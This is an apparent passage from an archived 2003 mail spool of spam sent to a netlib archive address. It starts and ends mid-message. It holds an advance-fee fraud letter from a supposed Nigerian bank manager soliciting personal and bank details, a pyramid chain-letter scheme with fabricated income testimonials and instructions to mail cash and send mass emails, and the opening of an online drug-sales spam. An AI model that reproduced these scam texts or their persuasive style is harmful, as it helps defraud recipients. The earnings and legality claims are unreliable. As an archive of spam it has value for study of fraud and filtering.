<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Alberta, Canada</fo=
nt></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"I had receive=
d
this program before. I deleted it, but later I wondered if I should have
given it a try. Of course, I had no idea who to contact to get another
copy, so I had to wait until I was e-mailed again by someone else........1=
1
months passed then it luckily came again...... I did not delete this one!
I made more than $490,000 on my first try and all the money came within
22 weeks".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Susan De Suza,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">New York, N.Y.</fon=
t></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"It really is =
a
great opportunity to make relatively easy money with little cost to you.
I followed the simple instructions carefully and within 10 days the money
started to come in. My first month I made $ 20,560.00 and by the end of
third month my total cash count was $ 362,840.00. Life is beautiful, Thanx=

to the internet".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Fred Dellaca,</font>=
</font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Westport, New Zeala=
nd</font></font></i></b></blockquote>

<hr width=3D"85%"></blockquote>

<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<p><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></font=
></b></center>
</blockquote>

<center><i><font face=3D"Arial"><font size=3D-1>If you have any questions =
as
to the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<p>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

<div class=3D"ItalicBold"></div>

</body>
</html>
oandm f rowtalrt

--.BA_27.A25--


From modey05@go.com Fri Aug 22 23:10:44 2003
Return-Path: <modey05@go.com>
Received: from wmailmta03o.seamail.go.com (wmailmta03of.seamail.go.com [199.181.134.40] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h7N3Ai8b004225
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 22 Aug 2003 23:10:44 -0400 (EDT)
Received: (qmail 17380 invoked from network); 23 Aug 2003 03:09:35 -0000
Received: from jtp04.seamail.go.com (HELO gomailjtp04) (10.192.72.223)
  by wmailmta03o.seamail.go.com with SMTP; 23 Aug 2003 03:09:35 -0000
Message-ID: <4966707.1061608174461.JavaMail.modey05@gomailjtp04>
Date: Fri, 22 Aug 2003 20:09:34 -0700 (PDT)
From: mike odey <modey05@go.com>
To: modey05@go.com
Subject: REQUEST
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
X-Mailer: GoMail 3.0.0
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id h7N3Ai8b004225

Attn:My dear friend

I am Dr Mike Odey, the Bank Manager of Diamond Bank of Nigeria, Lagos 
Branch.  I have urgent and very confidential business proposition for 
you.

On June 6, 1999, a FOREIGN Oil Consultant/Contractor with the Nigerian 
National 
Petroleum Corporation, Mr. Barry Kelly made a numbered time (Fixed) 
Deposit 
for 
twelve calendar months, valued at US$25,000,000.00(Twenty- five Million 
Dollars) in my branch.  

Upon maturity, I sent a routine notification to his forwarding address 
but got 
no reply.  After a month, we sent a reminder and finally we discovered 
from 
his 
contract employers, the Nigerian National Petroleum Corporation that 
Mr. Barry 
Kelly died from an automobile accident. On further investigation, I 
found out 
that he died without making a WILL, and all attempts to trace his next 
of kin 
to date has fruitless.

I therefore made further investigation and discovered that Mr. Barry 
Kelly did 
not declare any kin or relations in all his official documents, 
including his 
Bank Deposit paperwork in my Bank. This sum of US$25,000,000.00 is 
still 
sitting in my Bank and the interest is being rolled over with the 
principal 
sum 
at the end of each year.  

No one will ever come forward to claim it. According to Nigerian Law, 
at the 
expiration of 5 (five) years, the money will revert to the ownership of 
the 
Nigerian Government if nobody applies to claim the fund. Consequently, 
my 
proposal is that I will like you as an Foreigner to stand in as the 
next of 
kin 
to Mr. Barry Kelly so that the fruits of this old man’s labor will not 
get 
into 
the hands of some corrupt government  officials.  

This is simple, I will like you to provide immediately your full names, 
address, telephone and fax numers so that the Attorney will prepare the 
necessary documents and affidavits, which will put you in place as the 
next of 
kin. We shall employ the service of another Attorney for drafting and 
notarization 
of the WILL and to obtain the necessary documents and letter of 
probate/administration in your favor for the transfer.

A bank account in any part of the world, which you will provide, will 
then 
facilitate the transfer of this money to you as the beneficiary/next of 
kin.  
The money will be paid into your nominated account for us to share in 
the 
ratio 
of 60% for me, 35% for you and 5% to cover any accidental expenses on 
either 
sides during the course of this transaction.

There is no risk at all as all the paperwork for this transaction will 
be done 
by the Attorney and my position as the Branch Manager guarantees the 
successful 
execution of this transaction. Upon your 
response, I shall then provide you with more details and relevant 
documents 
that will help you understand the transaction better. 

Please observe utmost confidentiality, and rest assured that this 
transaction 
would be most profitable for both of us because I shall require your 
assistance 
to invest my share in your country. Looking forward to hearing from you 
soonest.

Best regards,

Dr Mike Odey.

PLAESE NOTE, SEND  YOUR  RESPONSES TO  drmikeodey@rediffmail.com   OR konkon@hknetmail.com  & koso@hknetmail.com

-------------------------------------------------

___________________________________________________
Check-out GO.com
GO get your free GO E-Mail account with expanded storage of 6 MB!
http://mail.go.com




From khxdysxn81@winmedia.co.za Thu Aug 28 00:00:31 2003
Return-Path: <khxdysxn81@winmedia.co.za>
Received: from lsanca1-ar14-4-60-151-132.lsanca1.dsl-verizon.net (lsanca1-ar14-4-60-151-132.lsanca1.dsl-verizon.net [4.60.151.132])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h7S3xj8b023495
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 28 Aug 2003 00:00:01 -0400 (EDT)
Received: from [0.161.16.69]
	by lsanca1-ar14-4-60-151-132.lsanca1.dsl-verizon.net SMTP id tPeg8n45P9329A;
	Wed, 27 Aug 2003 19:47:49 +0300
Message-ID: <h79151yogc-$i1jpq2@n2z8.80.1x.pgi>
From: "Danny Peters" <khxdysxn81@winmedia.co.za>
Reply-To: "Danny Peters" <khxdysxn81@winmedia.co.za>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Give Your Future Five Minutes f 
Date: Wed, 27 Aug 03 19:47:49 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".5472.818.B_"
X-Priority: 3
X-MSMail-Priority: Normal


--.5472.818.B_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>chain1</title>
</head>
<body text=3D"#000000" bgcolor=3D"#99FF99" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
<center><b><font face=3D"Arial,Helvetica" size=3D+3 color=3D"#3333FF">If I=
 could show you how to make</font></b>
<br><b><font face=3D"Arial,Helvetica" color=3D"#FF0000" size=3D+4>$50,000<=
/font></b>
<br><b><font face=3D"Arial,Helvetica" color=3D"#3333FF" size=3D+2>or more,=
 would you give me 2 minutes of your time?</font></b></center>
<P>
<center><table BORDER=3D5 CELLSPACING=3D0 CELLPADDING=3D20 WIDTH=3D"650" B=
GCOLOR=3D"#FFFFCC" >
<tr><td>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1 WIDTH=3D"55=
0" BGCOLOR=3D"#FFFF00" >
<tr><td>
<center><b><font face=3D"Times New Roman,Times">Learn how to start your ow=
n multilevel marketing business on the internet.<br>It=FFFFFF92s <font
size=3D+1=
>simple</font>, it=FFFFFF92s <font size=3D+1>easy</font>, it=FFFFFF92s
<font size=3D+1=
>honest</font>, and it=FFFFFF92s <font size=3D+1>legal</font>.&nbsp; Anyone
can =
do it.</font></b>
<br><b><font face=3D"Times New Roman,Times">All you need is a computer and=
 access to the internet.</font></center>
</td>
</tr>
</table></center>
<P><i><font face=3D"Arial,Helvetica">Will all this information really make=
 you wealthy? I have to be frank with you: I don't know how rich you'll ge=
t once you listen to, absorb and begin to use the secrets I'll show you. I=
'm giving you a hammer. Whether you build a doghouse or a castle is none o=
f my business. My suggestion: <font size=3D+1>Think BIG!</font> Isn't it t=
ime?</font></i>
<P><center><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font=
 size=3D+2>Don't regret not taking action!</font></font></font></b>
<P>
<P><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font size=3D=
+1>A One Time Investment Of $25 Plus This Simple Technology <br> Could Mak=
e You Financially Secure For Life!</font></font></font></b></center>

<center><table BORDER=3D6 CELLSPACING=3D0 CELLPADDING=3D7 WIDTH=3D"100=
%" BGCOLOR=3D"#FFFFFF" class=3D"center" >
<tr><td>
<P><center><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENC=
E</font></b></center>
<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to make at least $500,000 every 4 to 5 months <br> easily and comfortably,=
 please read the following...<BR>THEN READ IT AGAIN and AGAIN !!!</font></=
font></b></center>

<hr width=3D"85%">
<center>&nbsp;
<br><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fo=
nt></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>
<b><i><u><font face=3D"Arial"></font></u></i></b>
<p><b><i><font face=3D"Arial">&nbsp;</font></i></b>
<br><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>
<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font>
<center>&nbsp;
<br>
<hr WIDTH=3D"80%">
<b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>
<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b>
<br>
<hr WIDTH=3D"80%">
<br><b><font face=3D"Arial">&nbsp;&nbsp;</font></b></center>
<font face=3D"Arial">You will need all 5 reports so that you can save them=

on your computer and resell them.</font>
<center>&nbsp;
<br><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>
&nbsp;
<br><font face=3D"Arial">Within a few days <b>you will receive, via e-mail=
,
each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<br>&nbsp;
<br><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will lose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!</u></b></fon=
t>
<br><b><font face=3D"Arial">&nbsp;</font></b>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"90=
%" BGCOLOR=3D"#FFCC33" >
<tr>
<td>
<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b></=
center>
</td>
</tr>
</table></center>

<center>&nbsp;
<br><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such an=
d
you will be VERY profitable in a short period of time</font></font></i></b=
></center>
<font face=3D"Arial">After you have ordered all 5 reports, take this adver=
tisement
and REMOVE the name &amp; address of the person in REPORT # 5. This person=

has made it through the cycle and is no doubt counting their fortune. Emai=
l
them and ask that's what I always did.Move the name &amp; address in REPOR=
T
# 4 down TO REPORT # 5.Move the name &amp; address in REPORT # 3 down TO
REPORT # 4.Move the name &amp; address in REPORT # 2 down TO REPORT # 3.Mo=
ve
the name &amp; address in REPORT # 1 down TO REPORT # 2. Insert YOUR name
&amp; address in the REPORT # 1 Position.</font>
<center>&nbsp;
<br>&nbsp;
<br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &amp;=

address <b>ACCURATELY</b></font>
<br><font face=3D"Arial"><font size=3D-1>(Just cut and paste! This is crit=
ical
to <b>YOUR
</b>success. Take this entire letter,</font></font>
<br><font face=3D"Arial"><font size=3D-1>with the modified list of names, =
and
save it on your computer.)</font></font>
<br>&nbsp;
<br><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cent=
er>
<font face=3D"Arial"><b>Save this on a disk as well just in case you loose=

any data</b>. To assist you with marketing your business on the internet,
the 5 reports you purchase will provide you with invaluable marketing info=
rmation
which includes how to send bulk e-mails legally, where to find thousands
of free classified ads and much more. There are 2 Primary methods to get
this venture going:</font>
<br><font face=3D"Arial">&nbsp;</font>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1 WIDTH=3D"54=
0" BGCOLOR=3D"#FFFFCC" >
<tr>
<td><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY</fo=
nt></b>
<p><font face=3D"Arial">Let's say that you decide to start small, just to
see how it goes, and we will assume You and those involved send out only
5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font>
<center>
<p><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NUMBERS=
 DO
NOT LIE</font></font></font></b></center>

<p><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>GET A P=
ENCIL
&amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO MATTER HOW
YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did it was $55,00=
0
in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font>
<br><font face=3D"Arial">&nbsp;</font>
<br>
<hr WIDTH=3D"80%">
<center><b><font face=3D"Arial">At the bottom of this email is contact inf=
ormation
for</font></b>
<br><b><font face=3D"Arial">the company we used to send this mailing.</fon=
t></b><font face=3D"Arial">&nbsp;&nbsp;</font>
<hr WIDTH=3D"80%"></center>
</td>
</tr>
</table></center>

<center>
<p>&nbsp;
<br><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONL=
Y</b>.</font></center>
<font face=3D"Arial"><b>Notes: </b>Always send $5 cash (U.S. CURRENCY) for=

each Report. Checks NOT accepted. Make sure the cash is concealed by wrapp=
ing
it in at least 2 sheets of paper or foil will also work. On one of those
sheets of paper, write the NUMBER &amp; the NAME of the Report you are
ordering, YOUR E-MAIL ADDRESS and your name and postal address.</font>
<p><br>
<center>
<p><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></font>=
</b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<center><table BORDER=3D2 CELLPADDING=3D10 WIDTH=3D"90%" class=3D"center" =
>
<tr>
<td WIDTH=3D"10%" BGCOLOR=3D"#FF0000" class=3D"left">&nbsp;</td>

<td WIDTH=3D"90%" BGCOLOR=3D"#FFFFCC"><b><font face=3D"Arial">REPORT #1:&n=
bsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>C. Bernerd</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 319</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>NetWiz Rds</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>PO Box 025216, Apt SJO3016</fo=
nt></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Miami, FL 33102</font></font><=
/b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>M. Eiseman</font></f=
ont></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>P.O. Box 451971</fon=
t></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Sunrise, FL 33345-19=
71</font></font></b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>R. Chernick</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 771661</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>Coral Springs, FL 33077-1661</=
font></font></b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Sheilah W</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 2971</font></font></b=
>
<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b>
</td>
</tr>
</table></center>

<center><b><font face=3D"Arial"><font size=3D+0>&nbsp;</font></font></b>
<br><b><font face=3D"Arial"><font size=3D+0>There are currently more than =
570,000,000
people online worldwide!</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>&nbsp;=
</font></font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$$$$$=
$ YOUR
SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>
<font face=3D"Arial">&nbsp;</font>
<br><font face=3D"Arial">Follow these guidelines to guarantee your success=
:</font>
<br>&nbsp;
<br><font face=3D"Arial">If you do not receive at least 10 orders for Repo=
rt
#1 within 2 weeks, continue sending e-mails until you do.</font>
<br>&nbsp;
<br><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks
after that you should receive 100 orders or more for REPORT # 2. If you
did not, continue advertising or sending e-mails until you do.</font>
<br>&nbsp;
<br><font face=3D"Arial">**Once you have received 100 or more orders for
Report# 2, YOU CAN RELAX, because the system is already working for you,
and the cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Ever=
y
time your name is moved down on the list, you are placed in front of a
Different report.</font>
<br>&nbsp;
<br><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching
which report people are ordering from you. IF YOU WANT TO GENERATE MORE
INCOME SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN.
There is NO LIMIT to the income you can generate from this business!!!</fo=
nt>
<center><b><font face=3D"Arial">&nbsp;</font></b>
<br><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THI=
S
PROGRAM:</font></b></center>
<font face=3D"Arial">&nbsp;</font>
<br><font face=3D"Arial">You have just received information that can give
you financial freedom for the rest of your life, with <b>NO RISK</b> and
<b>JUST A LITTLE BIT OF EFFORT</b>. You can make more money in the next
few weeks and months than you have ever imagined. Follow the program <b>EX=
ACTLY
AS INSTRUCTED</b>. Do not change it in any way. It works exceedingly well
as it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to M. Eisman (me) I send out least
8 million emails a week with a dedicated mailing server I rent from the
bulk email company at the bottom of this page.&nbsp; The do all the work
and I just collect the $5 bills as they roll in!)</font>
<br>&nbsp;
<br><font face=3D"Arial">Remember though, the more you send out the more
potential customers you will reach. So my friend, I have given you the
ideas, information, materials and opportunity to become financially indepe=
ndent.
<b>IT IS UP TO YOU NOW!</b></font>
<br><font face=3D"Arial">&nbsp;&nbsp;&nbsp;</font>
<hr WIDTH=3D"80%">
<br><font face=3D"Arial">&nbsp;</font>
<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<br><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D+2>&nbsp;</font></font></b>
<br><i><font face=3D"Arial"><font size=3D-1>If you have any questions as t=
o
the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<br>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>&nbsp=
;</font></font></font></center>
</td>
</tr>
</table></center>

<p>&nbsp;
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D0 COLS=3D1 WIDTH=3D"65=
0" BGCOLOR=3D"#FFFFCC" >
<tr>
<td>
<center><font face=3D"Arial,Helvetica"><font size=3D-1>&nbsp;</font></font=
>
<br><font face=3D"Arial,Helvetica"><font size=3D-1>Bulk Email Marketing Se=
rvices
provided by Rapidmail 2003</font></font>
<br><font face=3D"Arial,Helvetica"><font size=3D-1>&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1><font color=3D"#FF00=
00">EXPLODE
</font>Y<font color=3D"#000000">our Profits</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>With 24/7 Dedicated =
Bulk
Email Servers!</font></font></b>
<br>
<hr WIDTH=3D"80%">
<br><b><font face=3D"Arial,Helvetica">Bulk Email can EXPLODE your Profits!=
</font></b><font size=3D-1></font>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>Get a Dedicated Bulk =
Email
Server sending out your ad</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>24 hours a day, 7 da=
ys
a week!</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>&nbsp;</font></font>=
</b>
<br><font face=3D"Arial,Helvetica"><font size=3D-2>(The number of emails y=
ou
get out will depend on your message size. Mailing an ad the size of this
one,&nbsp;</font></font>
<br><font face=3D"Arial,Helvetica"><font size=3D-2>you will get out on ave=
rage
8 million emails per week sent to our database of over 450 million Interne=
t
Users</font><font size=3D-1>)</font></font>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>Call 1-800-591-7751&n=
bsp;
ext:101</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>&nbsp;</font></font>=
</b></center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>&nbsp=
;</font></font></font>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>This mess=
age
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

</body>
</html>
z ocjknjgkcaztv
gv qso
lr 

--.5472.818.B_--


From 09czjypco@earthlink.com Thu Aug 28 20:47:02 2003
Return-Path: <09czjypco@earthlink.com>
Received: from 160.36.58.108 ([218.232.114.195])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h7T0kY8b002367;
	Thu, 28 Aug 2003 20:46:52 -0400 (EDT)
Received: from [114.56.204.238] by 160.36.58.108 SMTP id wm2C2V23w1un0L for <199902071506.kaa20808@netlib2.cs.utk.edu>; Fri, 29 Aug 2003 14:44:52 +0000
Message-ID: <lt-wz17l-vk43$3qe24yz636l8-z2@23yym.lm2.p3qm>
From: "Duane Carney" <09czjypco@earthlink.com>
Reply-To: "Duane Carney" <09czjypco@earthlink.com>
To: <199902071506.kaa20808@netlib2.cs.utk.edu>, <anon@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: Ambien-Soma-Adipex-Ionamin-Prozac-Flexeril-Fioricet...!               . jvoeli
Date: Fri, 29 Aug 03 14:44:52 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="__D08E_5_.F_B_200.E"
X-Priority: 1
X-MSMail-Priority: High


--__D08E_5_.F_B_200.E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><FONT  COLOR=3D"#8000ff" SIZE=3D2 PTSIZE=3D10><B>SOMA,<I>IONAMIN</I>=
..</FONT><FONT  COLOR=3D"#008000" BACK=3D"#ffffff" style=3D"BACKGROUND-CO=
LOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LAN=
G=3D"0"> Low Price, Fast Delivery, PRIVACY !</FONT><FONT COLOR=3D"#000000"=
 BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10=
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"></B><BR>FDA Approved Medic=
ations online. </FONT><FONT  COLOR=3D"#8000ff" BACK=3D"#ffffff" style=3D"B=
ACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF"
FACE=3D=
"Arial" LANG=3D"0"><B>SOMA, ,ADIPEX,Viagra</FONT><FONT  COLOR=3D"#000000" =
BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 =
FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"></B>, <BR>and MUCH MORE.<BR=
